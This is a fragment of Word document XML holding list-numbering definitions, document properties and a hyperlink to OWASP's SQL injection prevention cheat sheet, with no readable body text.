        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E6666434">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7C3A61B2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="409ADDEC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="45C286FA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B8E0EB76">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8D86CAF2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="46C67F96">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1BDC51B0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="280804AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE40216E"/>
    <w:lvl w:ilvl="0" w:tplc="C1D6A45E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2C5C150E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="17DCA910">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5A1ECAAC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D7E04CD0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2570A530">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C1964FC2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3168E336">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2AFC5408">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7CCE500B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EACAFE90"/>
    <w:lvl w:ilvl="0" w:tplc="9C3E6232">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="77FC833C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="23806EAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FABA7B12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="05B8C2D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="8E96950A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="127A45CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="ACCA52FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6B90E14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58B"/>
    <w:rsid w:val="004610F1"/>
    <w:rsid w:val="00BB4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4439"/>
  <w15:docId w15:val="{6C6F82A2-D0C4-4157-88E9-D1DB4B8B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eatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Shee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4568</Words>
  <Characters>26039</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>216</Lines>
  <Paragraphs>61</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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2026-05-02T03:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-04T05:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>